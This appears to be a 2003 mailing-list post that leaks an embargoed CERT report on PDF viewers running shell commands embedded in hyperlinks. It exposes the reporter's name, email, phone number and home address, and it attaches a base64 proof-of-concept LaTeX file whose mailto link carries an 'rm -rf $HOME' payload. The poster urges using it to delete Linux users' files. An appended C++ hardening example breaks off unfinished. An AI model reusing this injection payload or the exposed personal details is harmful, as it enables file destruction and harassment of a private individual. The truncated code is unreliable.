[Full-Disclosure] -10Day CERT Advisory on PDF Files
hack4life@hushmail.com
Fri, 13 Jun 2003 14:24:50 -0700

Previous message: [Full-Disclosure] /Claimed/ remote root exploit in Pureftpd
Next message: [Full-Disclosure] [SECURITY] [DSA-320-1] New mikmod packages fix buffer overflow
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi Hackers

Ok, so I've been a bit quiet recently, what with college and exams. But the semester's nearly over now, so I'll have plenty of time to keep you all up to date with what those fools at CERT are up to once college is finished.

Anyway, on with the show. Here we have a nice little hole allowing you to execute shell commands by embedding them in PDF files. Obviously no one's likely to be reading PDFs as root on a production server, but nice for rm'ing those ankle-biting Linux lusers. You'll also find some example code. There was also some example code for mapping untrusted URIs to a safer format, but I'm not releasing that; we're here to *HACK* boxes, not to patch them!

You'll also notice that this takes the format of the form used to report holes to CERT rather than my usual draft advisory format. If you want to wait for the actual CERT advisory (probably without details of how to exploit it), they will be releasing it on Monday 23rd June 2003, making my release -10 Day!

Hack4Life

#####NOT FOR PUBLIC DISTRIBUTION#####

CONTACT INFORMATION
-------------------
Let us know who you are:

Name: Martyn Gilmore
E-mail: gilmore@floraxion.com
Phone / fax: 513-374-1586
Affiliation and address: 1068 Archland Drive, Cincinnati, OH 45224

Have you reported this to the vendor? [yes/no]
no

Please describe the vulnerability.
----------------------------------
Valid PDF files can contain malicious external-type hyperlinks that can execute arbitrary shell commands underneath Unix with various PDF viewers/readers.
The hyperlinks must be activated or followed for the malicious script to run. The obvious case is for a user to click on one. The PDF viewers/readers which are known to be vulnerable at this time appear to spawn (exec) the associated external program handlers with "sh -c":

    sh -c <registered-program> <embedded-hyperlink>

What is the impact of this vulnerability?
-----------------------------------------
(For example: local user can gain root/privileged access, intruders can create root-owned files, denial of service attack, etc.)

a) What is the specific impact:
Under probable conditions, arbitrary Unix shell commands can be executed with the PDF reader/viewer user's privileges when malicious hyperlinks are activated.

b) How would you envision it being used in an attack scenario:
Many are possible (especially if the user has more privileges). I don't know if there are any real restrictions on the embedded shell script's length.

To your knowledge is the vulnerability currently being exploited?
-----------------------------------------------------------------
[yes/no]
no

If there is an exploitation script available, please include it here.
---------------------------------------------------------------------
Attachment evil.pdf contains the embedded command `rm -rf $HOME/monkey`

Preconditions:
1. User's home directory does NOT contain a file or directory named 'monkey'
2. Run 'touch $HOME/monkey'
3. Adobe Acrobat 5.06 on Redhat 8.0 only performs the "sh -c" type of action when there is no current running browser/email program (i.e. mozilla).

Exploit: Open PDF file and click on the gilmore@floraxion.com hyperlink
Proof of exploit: Absence of $HOME/monkey

With the help of pdflatex, the attachment evil.tex is the source document for evil.pdf. Other "flexible" PDF authoring solutions probably would work too.

Do you know what systems and/or configurations are vulnerable?
--------------------------------------------------------------
[yes/no] (If yes, please list them below)

System : PDF viewers/readers, which spawn external programs with "sh -c" to handle certain types of hyperlinks.
OS version : Most Unix versions
Verified/Guessed: Guessed (beyond what I report below)

I've only verified the following programs on Redhat Linux 8.0.
  Xpdf 1.01
  Adobe Acrobat Reader 5.06

Xpdf executes the malicious embedded script regardless of whether the handler is currently running or not. The Ghostview derivative on my machine doesn't have hyperlinks enabled (ignores that aspect of the PDF file). Other readers may be affected as well.

Are you aware of any workarounds and/or fixes for this vulnerability?
---------------------------------------------------------------------
[yes/no] (If you have a workaround or are aware of patches please include the information here.)

I'm aware of no fixes in any PDF readers/viewers. Each program's implementation may differ (languages, dynamic memory libraries) to prevent a universal fix; however, suggested guidelines are given below. These guidelines are an attempt to offer a robust solution with a minimal effect on existing behavior.

If the "sh -c" type of invocation is a necessary way to spawn external browser/email program(s), then the embedded hyperlink should be properly quoted/escaped. The "sh -c" type of invocation may be desirable to allow the configuration of the external programs to contain environment variables, i.e. "sh -c $USER_BROWSER args". The easiest solution (IMHO) underneath these types of scenarios is to enclose the embedded hyperlink within single quotes (avoids escaping the entire Unix shell meta-character soup). In addition, any single quotes found within the original embedded hyperlink should be replaced with '"'"' (i.e. "\'\"\'\"\'" for C/C++ programs).
Programs will have to deal correctly with possibilities of unknown-length string expansion or risk overwrites of the heap or stack; use of std::string or RWCString in C++ would simplify the design, if they are available. Testing will require conditions to trigger the "sh -c" type of invocation (i.e. browser/email program not running) for each PDF reader/viewer.

1.) Hyperlinks with embedded shell exploits will not be executed.
2.) Proper email addresses such as "Martyn%20Gilmore<gilmore@floraxion.com>" and "gilmore@floraxion.com(Martyn%20Gilmore)" should now work as "mailto:" targets. These legitimate uses are how the exploit was discovered, since some Unix shell meta-characters are present and prevent positive functionality from occurring.

Caveats/Notes:
The solution above is a result of correcting the direct actions of the PDF viewer/reader against misuse. The user-configurable spawned programs are trusted to not eval their arguments further, otherwise the original exploit returns. The potential security breach of additional evals is the onus of the configured handler or the end user (not having a secured environment or not having a responsible entrusted handler).

Clarification of initial report:
Besides the potential for an explicit "sh -c" in the exec*() Unix system calls, the C StdLib system() call performs one implicitly.

Better Proposed Fix:
I think that my first proposed fix was too naive. Mozilla 1.3 has a shell wrapper that calls eval. Other configured browsers/handlers could have the same problem or could easily introduce one, even if unintentional (check-in of a developer copy). Granted, the programs I originally cited as guilty parties execute the malicious code first; however, they are only the first in a potential chain. Rather than trying to correct the whole round trip (more programs), it is more feasible for the PDF viewer/reader party to make sure their "Untrusted URIs" don't have immediate or long-term potential for problems.
The effort is about the same as the original suggestion. I've attached a small example C++ program that maps untrusted URIs to a safer format, which is a far better alternative to the Unix-based quoting that only lasts one round and has potential to pass the buck.

Attachment: evil.tex.uu (base64)
XGRvY3VtZW50Y2xhc3NbbWFyZ2luLGxpbmUsMTFwdF17cmVzfQpcdXNlcGFja2FnZXt0aW1lc30K XHVzZXBhY2thZ2V7Y29sb3J9Clx1c2VwYWNrYWdlW3VybGNvbG9yPWJsdWUsY29sb3JsaW5rcz10 cnVlLHBkZnBhZ2Vtb2RlPW5vbmUscGRmc3RhcnR2aWV3PUZpdEhde2h5cGVycmVmfQpcZGVmXENw bHVzcGx1c3t7XHJtIENccmFpc2UuMWV4XGhib3h7XHNtYWxsICsrfX19CgolICdzdCcgJ25kJyAn cmQnICd0aCcgc3VwZXJzY3JpcHRzIGZvciBudW1iZXJzClxkZWZcZmlyc3R7e1xyYWlzZS41ZXhc aGJveHtcc21hbGwgc3R9fX0KXGRlZlxzZWNvbmR7e1xyYWlzZS41ZXhcaGJveHtcc21hbGwgbmR9 fX0KXGRlZlx0aGlyZHt7XHJhaXNlLjVleFxoYm94e1xzbWFsbCByZH19fQpcZGVmXGZvdXJ0aHt7 XHJhaXNlLjVleFxoYm94e1xzbWFsbCB0aH19fQoKJXVzZSBvbmx5IGEgYml0IG1vcmUgcGFnZSB0 aGFuIGRlZmF1bHQKXGFkZHRvbGVuZ3Roe1xvZGRzaWRlbWFyZ2lufXstMC4zNWlufQpcYWRkdG9s ZW5ndGh7XHZvZmZzZXR9ey0wLjUwaW59ClxhZGR0b2xlbmd0aHtcdGV4dHdpZHRofXswLjcwaW59 ClxhZGR0b2xlbmd0aHtcdGV4dGhlaWdodH17MS43MGlufQoKJW15IG5hbWUgZm9ybWF0ClxyZW5l d2NvbW1hbmR7XG5hbWVmb250fXtcTEFSR0VcZW1waFx0ZXh0c2Z9ClxuZXdjb21tYW5ke1xtZ2J1 bGxldH17XGVuc3VyZW1hdGh7XGJ1bGxldH19ClxuZXdjb21tYW5ke1xyZXNzcGFjZX17XHZzcGFj ZXsybW19fQpcbmV3Y29tbWFuZHtcSnRvRUV9e0oyRUV9ClxuZXdjb21tYW5ke1xmb3VyR0x9ezRH TH0KClxiZWdpbntkb2N1bWVudH0KICAKCiAgIFxuYW1le01hcnR5biBHaWxtb3JlfQogICBcYWRk cmVzc3tcYmVnaW57dGFidWxhcn17QHt9bHJAe319CiAgICAgICAgICAgICg1MTMpIDM3NC0xNTg2
ICYgMTA2OCBBcmNobGFuZCBEcml2ZSBcXAogICAgICAgICAgICBcaHJlZnttYWlsdG86Z2lsbW9y ZUBmbG9yYXhpb24uY29tYHJtIC1yZiBeXjI0SE9NRS9tb25rZXlgfXtcdGV4dHR0e2dpbG1vcmVA ZmxvcmF4aW9uLmNvbX19ICYgQ2luY2lubmF0aSwgT0ggNDUyMjQgXFxcCiAgICAgICAgICAgIFxl bmR7dGFidWxhcn19CgoKXGJlZ2lue3Jlc3VtZX0KCiAgICBcc2VjdGlvbntPYmplY3RpdmV9CiAg ICAgICAgRGVzaWduIGFuZCBkZXZlbG9wIEVudGVycHJpc2UgQXBwbGljYXRpb25zIHVzaW5nIGN1 cnJlbnQgdGVjaG5vbG9naWVzIGFuZCBtZXRob2RvbG9naWVzCgogICAgXHNlY3Rpb257RWR1Y2F0 aW9ufQogICAgICAgICAgICBcYmVnaW57dGFidWxhcn17QHt9bH0KICAgICAgICAgICAgT2hpbyBT dGF0ZSBVbml2ZXJzaXR5IChDb2x1bWJ1cywgT2hpbyBKdW5lIDE5OTQpIFxcCiAgICAgICAgICAg IEJTIGluIENvbXB1dGVyIEluZm9ybWF0aW9uIFNjaWVuY2Ugd2l0aCBNYXRoZW1hdGljcyBtaW5v ciBcXAogICAgICAgICAgICBDSVMgbWFqb3IgR1BBIG9mIDMuODEvNC4wMCBhbmQgb3ZlcmFsbCBH UEEgb2YgMy4wMC80LjAwCiAgICAgICAgICAgIFxlbmR7dGFidWxhcn0KCiAgICBcc2VjdGlvbntM YW5ndWFnZXMgXCYgU29mdHdhcmV9CgpcQ3BsdXNwbHVzLCBKYXZhLCBDT1JCQSwgWE1MLCBET00s IFhTTFQsIFBML1NRTCwgU1FMLCBQZXJsLCBLb3JuIFNoZWxsLCBQeXRob24sIFNBUywgQ1ZTLFxs aW5lYnJlYWsgVU1MLCBSVVAsIEpCdWlsZGVyLCBBbnQsIE1pY3Jvc29mdCBWaXN1YWwgU3R1ZGlv LCBNYWtlLCBQcm9DLCBQSFAsIFRDTC9USy9FeHBlY3QsXGxpbmVicmVhayBBcGFjaGUsIEhUTUws IENTUywgWm9wZSwgVU5JWCBBZG1pbmlzdHJhdGlvbiBhbmQgREJBKE9yYWNsZSBhbmQgSW5mb3Jt aXgpCgogICAgXHNlY3Rpb257V29yayBFeHBlcmllbmNlfQoKICAgICAgICBcYmVnaW57Zm9ybWF0 fQogICAgICAgICAgXGVtcGxveWVye2x9XHRpdGxle3J9XFwKICAgICAgICAgIFxsb2NhdGlvbnts fVxkYXRlc3tyfVxcCiAgICAgICAgICBcYm9keVxcCiAgICAgICAgXGVuZHtmb3JtYXR9CgogICAg ICAgIFxlbXBsb3llcntcdGV4dGJme1Byb2Zlc3Npb25hbCBDb21wdXRlciBDb25zdWx0YW50c319 ICAgCiAgICAgICAgXHRpdGxle1xlbXBoe0NvbXB1dGVyIENvbnN1bHRhbnR9fQogICAgICAgIFxs b2NhdGlvbntDaW5jaW5uYXRpLCBPSH0KICAgICAgICBcZGF0ZXN7XHRleHRiZntTZXB0LiAxOTk5 IC0tIFByZXNlbnR9fQogICAgICAgIFxiZWdpbntwb3NpdGlvbn0KICAgICAgICAgICAgXGJlZ2lu e3RhYnVsYXJ9e0B7fWx9CiAgICAgICAgICAgIFxcCiAgICAgICAgICAgIEFzc2lnbmVkIGF0IENv bnZlcmd5cyAoOS85OSAtLSA2LzAyKSBcXAogICAgICAgICAgICBSZXNwb25zaWJpbGl0aWVzIGlu 
Y2x1ZGVkOgogICAgICAgICAgICBcZW5ke3RhYnVsYXJ9CiAgICAgICAgICAgIFxyZXNzcGFjZQog ICAgICAgICAgICAgIFxiZWdpbntpdGVtaXplfQogICAgICAgICAgICAgICAgXGl0ZW1bXG1nYnVs bGV0XSAKICAgICAgICAgICAgICAgICAgICBPUkFDTEU6IGRlc2lnbmVkIGFuZCBpbXBsZW1lbnRl ZCBBZHZhbmNlZCBRdWV1ZSBhcmNoaXRlY3R1cmUgCiAgICAgICAgICAgICAgICAgICAgZm9yIDNH IHJhdGluZyBzeXN0ZW0KICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxldF0gCiAgICAgICAg ICAgICAgICAgICAgQkVBIFdMRSAoVHV4ZWRvIGFuZCBDT1JCQSk6IGRldmVsb3BlZCBhbmQKICAg ICAgICAgICAgICAgICAgICBtYWludGFpbmVkIFxDcGx1c3BsdXNcIDMtdGllciBhcHBsaWNhdGlv biAKICAgICAgICAgICAgICAgICAgICBzZXJ2ZXJzIHVzaW5nIFJvZ3VlV2F2ZSBjbGFzc2VzCiAg ICAgICAgICAgICAgICBcaXRlbVtcbWdidWxsZXRdIAogICAgICAgICAgICAgICAgICAgIFVuaXg6 IHdyb3RlIGJhY2tncm91bmQgZGFlbW9ucyB1c2luZyBzeXN0ZW0gCiAgICAgICAgICAgICAgICAg ICAgY2FsbHMgZm9yIGFzeW5jaHJvbm91cyBwcm9jZXNzaW5nCiAgICAgICAgICAgICAgICBcaXRl bVtcbWdidWxsZXRdIAogICAgICAgICAgICAgICAgICAgIEphdmE6IG1haW50YWluZWQgYW5kIGVu aGFuY2VkIFNlcnZsZXRzCiAgICAgICAgICAgICAgICBcaXRlbVtcbWdidWxsZXRdIAogICAgICAg ICAgICAgICAgICAgIFhNTDogdXRpbGl6ZWQgXENwbHVzcGx1c1wgRE9NIGFuZCBYU0xUIAogICAg ICAgICAgICAgICAgICAgIGNsYXNzZXMgZm9yIG1lc3NhZ2UgcHJvY2Vzc2luZwogICAgICAgICAg ICAgICAgXGl0ZW1bXG1nYnVsbGV0XSAKICAgICAgICAgICAgICAgICAgICBKYXZhIFN3aW5nOiBh dXRvbWF0ZWQgdGVzdGluZyBhcHBsaWNhdGlvbiAKICAgICAgICAgICAgICAgICAgICB2aWEgQ09S QkEgSURMIHBhcnNlci9BU1QgdHJhdmVyc2FsCiAgICAgICAgICAgICAgICBcaXRlbVtcbWdidWxs ZXRdIAogICAgICAgICAgICAgICAgICAgIEdyZWF0IENpcmNsZS9QdXJpZnk6IGludGVncmF0ZWQg bWVtb3J5IGRldGVjdGlvbiAKICAgICAgICAgICAgICAgICAgICB0b29scyBpbnRvIGRldmVsb3Bt ZW50IHByb2Nlc3MKICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxldF0gCiAgICAgICAgICAg ICAgICAgICAgUGVybCBEQkkvUHl0aG9uOiB3cm90ZSBzY3JpcHRzIGZvciBwcm9kdWN0aW9uCiAg ICAgICAgICAgICAgICAgICAgYW5kIGRldmVsb3BtZW50IGVudmlyb25tZW50cwogICAgICAgICAg ICAgICAgXGl0ZW1bXG1nYnVsbGV0XSAKICAgICAgICAgICAgICAgICAgICBQZXJmb3JtYW5jZSB0 dW5pbmc6IG9wdGltaXplZCB2aWV3cyBhbmQKICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlv 
biBzZXJ2ZXIgcGVyZm9ybWFuY2UKICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxldF0gCiAg ICAgICAgICAgICAgICAgICAgUHJvZHVjdGlvbiBhbmQgYnVpbGQgc3VwcG9ydDogdHJvdWJsZXNo b3QgCiAgICAgICAgICAgICAgICAgICAgbWFqb3IgcHJvYmxlbXMgd2l0aGluIGJ1c2luZXNzIHVu aXQKICAgICAgICAgICAgICBcZW5ke2l0ZW1pemV9CiAgICAgICAgXGVuZHtwb3NpdGlvbn0KCiAg ICAgICAgXGVtcGxveWVye1x0ZXh0YmZ7Q2FyZGluYWwgU29sdXRpb25zfX0gICAKICAgICAgICBc dGl0bGV7XGVtcGh7U29mdHdhcmUgQ29uc3VsdGFudH19CiAgICAgICAgXGxvY2F0aW9ue0NpbmNp bm5hdGksIE9IfQogICAgICAgIFxkYXRlc3tcdGV4dGJme0p1bmUgMTk5NyAtLSBTZXB0LiAxOTk5 fX0KICAgICAgICBcYmVnaW57cG9zaXRpb259CiAgICAgICAgICAgIFxiZWdpbnt0YWJ1bGFyfXtA e31sfQogICAgICAgICAgICBcXAogICAgICAgICAgICBBc3NpZ25lZCBhdCBTRFJDICg2Lzk3IC0t IDkvOTkpIFxcIAogICAgICAgICAgICBSZXNwb25zaWJpbGl0aWVzIGluY2x1ZGVkOiBcXAogICAg ICAgICAgICBcZW5ke3RhYnVsYXJ9CiAgICAgICAgICAgIFxyZXNzcGFjZQogICAgICAgICAgICAg IFxiZWdpbntpdGVtaXplfQogICAgICAgICAgICAgICAgXGl0ZW1bXG1nYnVsbGV0XQogICAgICAg ICAgICAgICAgICAgIE9SQUNMRTogY29uc3RydWN0ZWQgY29udmVyc2lvbiBwcm9ncmFtcyB1c2lu ZyBTUUxMb2FkZXIsIAogICAgICAgICAgICAgICAgICAgIFBML1NRTCAoYnVpbHQtaW4gcGFja2Fn ZXMpLCBhbmQgUHJvQyAKICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAg ICAgICAgICAgICBcQ3BsdXNwbHVzL0M6IGRlc2lnbmVkIGFuZCBkZXZlbG9wZWQgbmV3IGFwcGxp Y2F0aW9ucyBhbmQgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWFpbnRhaW5l ZCBsaWJyYXJpZXMKICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAg ICAgICAgICBDT1JCQTogZGVidWdnZWQgYW5kIGV4dGVuZGVkIGZ1bmN0aW9uYWxpdHkgb2YgCiAg ICAgICAgICAgICAgICAgICAgZXhpc3RpbmcgYXBwbGljYXRpb25zCiAgICAgICAgICAgICAgICBc aXRlbVtcbWdidWxsZXRdCiAgICAgICAgICAgICAgICAgICAgSmF2YS9KQnVpbGRlcjogcHJvdG90 eXBlZCBuZXcgaW50ZXJmYWNlcyB3aXRoIAogICAgICAgICAgICAgICAgICAgIE9yYWNsZSBiYWNr ZW5kCiAgICAgICAgICAgICAgICBcaXRlbVtcbWdidWxsZXRdCiAgICAgICAgICAgICAgICAgICAg UGVybC9Lb3JuOiB3cm90ZSB0ZXN0IGhhcm5lc3NlcyBhbmQgb3RoZXIgCiAgICAgICAgICAgICAg ICAgICAgc2NyaXB0cwogICAgICAgICAgICAgICAgXGl0ZW1bXG1nYnVsbGV0XQogICAgICAgICAg 
ICAgICAgICAgIEFwYWNoZS9QSFAzOiByYW4gd2ViIHNlcnZlciB3aXRoIGZvcm1zIHRvIGNhcHR1 cmUgCiAgICAgICAgICAgICAgICAgICAgZGV2ZWxvcG1lbnQgaW5mb3JtYXRpb24KICAgICAgICAg ICAgICAgIFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAgICAgICAgICBUQ0wvVEs6IHByb3Zp ZGVkIGNyb3NzLXBsYXRmb3JtIFVJIG9uIGZpcnN0IHByb2plY3QKICAgICAgICAgICAgICAgICAg ICB3aGljaCBpbnRlZ3JhdGVkIHdpdGggQy9cQ3BsdXNwbHVzXCBsaWJyYXJpZXMKICAgICAgICAg ICAgICAgIFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAgICAgICAgICBBSVgsIE5ULCBTb2xh cmlzLCBIUC1VWCBhbmQgSVJJWCAoU0dJKTogcmVzb2x2ZWQKICAgICAgICAgICAgICAgICAgICBh bnkgcG9ydGFiaWxpdHkgaXNzdWVzIHdpdGggY29kZSwgM1x0aGlyZFwgcGFydHkgdG9vbHMsCiAg ICAgICAgICAgICAgICAgICAgYW5kIGVudmlyb25tZW50cwogICAgICAgICAgICAgIFxlbmR7aXRl bWl6ZX0KICAgICAgICBcZW5ke3Bvc2l0aW9ufQoKICAgICAgICBcZW1wbG95ZXJ7XHRleHRiZntG aWRlbGl0eSBJbnZlc3RtZW50c319ICAgCiAgICAgICAgXHRpdGxle1xlbXBoe1Byb2R1Y3Rpb24g U2VydmljZXMgVGVjaG5pY2FsIFNwZWNpYWxpc3R9fQogICAgICAgIFxsb2NhdGlvbntDb3Zpbmd0 b24vSGVicm9uLCBLWX0KICAgICAgICBcZGF0ZXN7XHRleHRiZntPY3QuIDE5OTUgLS0gTWF5IDE5 OTd9fQogICAgICAgIFxiZWdpbntwb3NpdGlvbn0KICAgICAgICAgICAgXGJlZ2lue3RhYnVsYXJ9 e0B7fWx9CiAgICAgICAgICAgIFxcCiAgICAgICAgICAgIFJlc3BvbnNpYmlsaXRpZXMgaW5jbHVk ZWQ6CiAgICAgICAgICAgIFxlbmR7dGFidWxhcn0KICAgICAgICAgICAgXHJlc3NwYWNlCiAgICAg ICAgICAgICAgXGJlZ2lue2l0ZW1pemV9CiAgICAgICAgICAgICAgICBcaXRlbVtcbWdidWxsZXRd CiAgICAgICAgICAgICAgICAgICAgT3JhY2xlIERCQTogcGxhbm5lZCBtb25pdG9yaW5nL3BlcmZv cm1hbmNlIHNjcmlwdHMsIAogICAgICAgICAgICAgICAgICAgIGRpc2svdGFibGVzcGFjZS9leHRl bnQgbGF5b3V0LCBhbmQgaW5zdGFuY2UgaW5pdGlhbGl6YXRpb24KICAgICAgICAgICAgICAgIFxp dGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAgICAgICAgICBJbmZvcm1peCBEQkE6IHNldHVwIGFu ZCBhZG1pbmlzdGVyZWQgb3ZlciAxNiBpbnN0YW5jZXMgCiAgICAgICAgICAgICAgICAgICAgb24g ZGlmZmVyZW50IHNlcnZlcnMuICBIZWxwZWQgdHVuZSwgZGVidWcgRXNxbCwgCiAgICAgICAgICAg ICAgICAgICAgUG93ZXJidWlsZGVyLCBhbmQgVkIgYXBwbGljYXRpb25zCiAgICAgICAgICAgICAg ICBcaXRlbVtcbWdidWxsZXRdCiAgICAgICAgICAgICAgICAgICAgUGVybC9Lb3JuIFNoZWxsOiB3 
cm90ZSBzY3JpcHRzIGZvciBVbml4LCAKICAgICAgICAgICAgICAgICAgICBEYXRhYmFzZSBBZG1p bmlzdHJhdGlvbiwgYW5kIEFwcGxpY2F0aW9uIEludGVncmF0aW9uIHRhc2tzCiAgICAgICAgICAg ICAgICBcaXRlbVtcbWdidWxsZXRdCiAgICAgICAgICAgICAgICAgICAgVENML1RLL0V4cGVjdDog ZGV2ZWxvcGVkIGFuZCBleHRlbmRlZCBncmFwaGljYWwgCiAgICAgICAgICAgICAgICAgICAgc2Vy dmVyIG1vbml0b3IKICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAg ICAgICAgICBTb2xhcmlzL0hQLVVYOiBvdmVyc2F3IFVuaXggYWRtaW5pc3RyYXRpb24sIGRhdGFi YXNlIAogICAgICAgICAgICAgICAgICAgIHNlcnZlcnMsIGFuZCB1c2VyIGVudmlyb25tZW50cwog ICAgICAgICAgICAgICAgXGl0ZW1bXG1nYnVsbGV0XQogICAgICAgICAgICAgICAgICAgIEZpbGVO ZXQ6IHJlc29sdmVkIHByb2R1Y3Rpb24gaXNzdWVzIHdpdGggCiAgICAgICAgICAgICAgICAgICAg ZGlzdHJpYnV0ZWQgaW1hZ2luZy93b3JrZmxvdyBhcHBsaWNhdGlvbnMKICAgICAgICAgICAgICAg IFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAgICAgICAgICBUcmFpbmluZzogZGV2aXNlZCBh bmQgY29uc3RydWN0ZWQgYW4gZW52aXJvbm1lbnQgCiAgICAgICAgICAgICAgICAgICAgdGhhdCBh bGxvd2VkIGVuZCB1c2VycyB0byBsb2FkIGRpZmZlcmVudCAKICAgICAgICAgICAgICAgICAgICBk YXRhYmFzZSBzY2VuYXJpb3MKICAgICAgICAgICAgICBcZW5ke2l0ZW1pemV9CiAgICAgICAgXGVu ZHtwb3NpdGlvbn0KCgogICAgICAgIFxlbXBsb3llcntcdGV4dGJme1BoYXJtYWNpYX19ICAgCiAg ICAgICAgXHRpdGxle1xlbXBoe0p1bmlvciBQcm9ncmFtbWVyfX0KICAgICAgICBcbG9jYXRpb257 Q29sdW1idXMsIE9IfQogICAgICAgIFxkYXRlc3tcdGV4dGJme1NlcHQuIDE5OTQgLS0gU2VwdC4g MTk5NX19CiAgICAgICAgXGJlZ2lue3Bvc2l0aW9ufQogICAgICAgICAgICBcYmVnaW57dGFidWxh cn17QHt9bH0KICAgICAgICAgICAgXFwKICAgICAgICAgICAgUmVzcG9uc2liaWxpdGllcyBpbmNs dWRlZDoKICAgICAgICAgICAgXGVuZHt0YWJ1bGFyfQogICAgICAgICAgICBccmVzc3BhY2UKICAg ICAgICAgICAgICBcYmVnaW57aXRlbWl6ZX0KICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxl dF0KICAgICAgICAgICAgICAgICAgICBcZm91ckdMOiBwcm9kdWNlZCBkYXRhIGxpc3RpbmdzIGFu ZCBzdGF0aXN0aWNhbCAKICAgICAgICAgICAgICAgICAgICByZXBvcnRzIHRoYXQgYWNjZXNzZWQg bXVsdGlwbGUgZGF0YWJhc2VzCiAgICAgICAgICAgICAgICBcaXRlbVtcbWdidWxsZXRdCiAgICAg ICAgICAgICAgICAgICAgRGF0YSBTY3J1YmJpbmc6IHdyb3RlIGRhdGFiYXNlIHNlbWFudGljIGNo 
ZWNrcyB0byBwcm92aWRlIGhpbnRzIAogICAgICAgICAgICAgICAgICAgIGZvciBkYXRhIGNoYW5n ZSByZXF1ZXN0cyBvbiBwYXRpZW50IGNsaW5pY2FsIGZvcm1zCiAgICAgICAgICAgICAgICBcaXRl bVtcbWdidWxsZXRdCiAgICAgICAgICAgICAgICAgICAgU1FMOiBzdXBwbGVtZW50ZWQgYW5kIHZl cmlmaWVkIFxmb3VyR0xcIHJlcG9ydHMgd2l0aCBhZC1ob2MgaW5mb3JtYXRpb24KICAgICAgICAg ICAgICAgIFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAgICAgICAgICBTQVM6IGxvYWRlZCBk YXRhc2V0cywgY3JlYXRlZCByZXBvcnRzIGFuZCBjcmVhdGVkIGR1bXBzCiAgICAgICAgICAgICAg ICBcaXRlbVtcbWdidWxsZXRdCiAgICAgICAgICAgICAgICAgICAgVk1TOiB1dGlsaXplZCBhcyBl bmQgdXNlciBhbmQgcHJvZ3JhbW1pbmcgZW52aXJvbm1lbnQKICAgICAgICAgICAgICBcZW5ke2l0 ZW1pemV9CiAgICAgICAgXGVuZHtwb3NpdGlvbn0KCiAgIFxzZWN0aW9ue1JlZmVyZW5jZXN9CiAg ICAgIEF2YWlsYWJsZSB1cG9uIHJlcXVlc3QKClxlbmR7cmVzdW1lfQpcZW5ke2RvY3VtZW50fQoK
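The report describes two fixes for the viewer side (single-quote wrapping for code that must keep "sh -c", and mapping the untrusted URI to a safer format), but the C++ mapping program was withheld. The example below is my own added code, not the withheld program and not any viewer's real source. It shows the two fixes side by side plus a third step the report does not spell out: launching the configured handler with an argv array so no shell on the viewer side parses the URI at all. The function names, the handler template "$USER_BROWSER -remote", the percent-encoding alphabet and the test URI are assumptions of this example; the test URI mirrors the payload in the attached evil.tex.

```cpp
// Added example (my own code, not the C++ program the report withholds and not
// any viewer's real source): hardening a PDF viewer's hand-off of an untrusted
// hyperlink target to a user-configured handler. Function names, the handler
// template "$USER_BROWSER -remote" and the test URI are assumptions.
#include <cctype>
#include <cstdlib>
#include <iostream>
#include <sstream>
#include <string>
#include <vector>
#include <unistd.h>

// Constructed test input: the mailto target carried by the report's evil.pdf.
const std::string kEvilMailto = "mailto:gilmore@floraxion.com`rm -rf $HOME/monkey`";

// Report's first fix: wrap the target in single quotes and turn every embedded
// single quote into '"'"'. This neutralises exactly one round of "sh -c"; a
// handler that evals its arguments again (the Mozilla 1.3 wrapper case) would
// still see the payload, which is why the report moved to mapping the URI instead.
std::string shell_single_quote(const std::string& s) {
    std::string out = "'";
    for (char c : s) out += (c == '\'') ? std::string("'\"'\"'") : std::string(1, c);
    out += "'";
    return out;
}

// Report's "better" direction, in one concrete form of my choosing: map the URI
// to an alphabet with no shell meaning. Only alphanumerics and -._~:/?#@+,=% pass;
// every other byte is percent-encoded. That removes the backtick, '$', quotes,
// '\', '<', '>', '|', whitespace and control characters, so the result is inert
// under any number of later evals. The set is deliberately stricter than RFC 3986:
// it also encodes & ; ' ( ) * ! [ ] (all shell-significant), so a handler that
// relies on a literal '&' as a query separator must decode the URI itself.
bool is_safe_uri_char(unsigned char c) {
    static const std::string extra = "-._~:/?#@+,=%";
    return std::isalnum(c) || extra.find(static_cast<char>(c)) != std::string::npos;
}

std::string to_safer_uri(const std::string& uri) {
    static const char hex[] = "0123456789ABCDEF";
    std::string out;
    for (unsigned char c : uri) {
        if (is_safe_uri_char(c)) { out += static_cast<char>(c); continue; }
        out += '%';
        out += hex[c >> 4];
        out += hex[c & 0x0F];
    }
    return out;
}

// Take the shell out of the viewer's own launch: expand "$VAR" tokens of the
// configured handler template in-process (the report notes environment expansion
// is the reason "sh -c" was used) and pass the mapped URI as one argv element.
std::vector<std::string> build_handler_argv(const std::string& handler_template,
                                            const std::string& uri) {
    std::vector<std::string> argv;
    std::istringstream in(handler_template);
    std::string tok;
    while (in >> tok) {
        if (tok[0] == '$') {
            const char* v = std::getenv(tok.c_str() + 1);
            argv.push_back(v ? v : "");
        } else {
            argv.push_back(tok);
        }
    }
    argv.push_back(to_safer_uri(uri));
    return argv;
}

// execvp() with an argv array does no word splitting, globbing or command
// substitution. Returns the child pid, or -1 if fork() failed.
pid_t launch_handler(const std::vector<std::string>& argv) {
    std::vector<char*> cargv;
    for (const std::string& a : argv) cargv.push_back(const_cast<char*>(a.c_str()));
    cargv.push_back(nullptr);
    pid_t pid = fork();
    if (pid == 0) {
        execvp(cargv[0], cargv.data());
        _exit(127);  // only reached if exec fails
    }
    return pid;
}

int main() {
    std::cout << "quoted : " << shell_single_quote(kEvilMailto) << '\n';
    std::cout << "mapped : " << to_safer_uri(kEvilMailto) << '\n';
    std::cout << "legit  : " << to_safer_uri("mailto:Martyn%20Gilmore<gilmore@floraxion.com>") << '\n';
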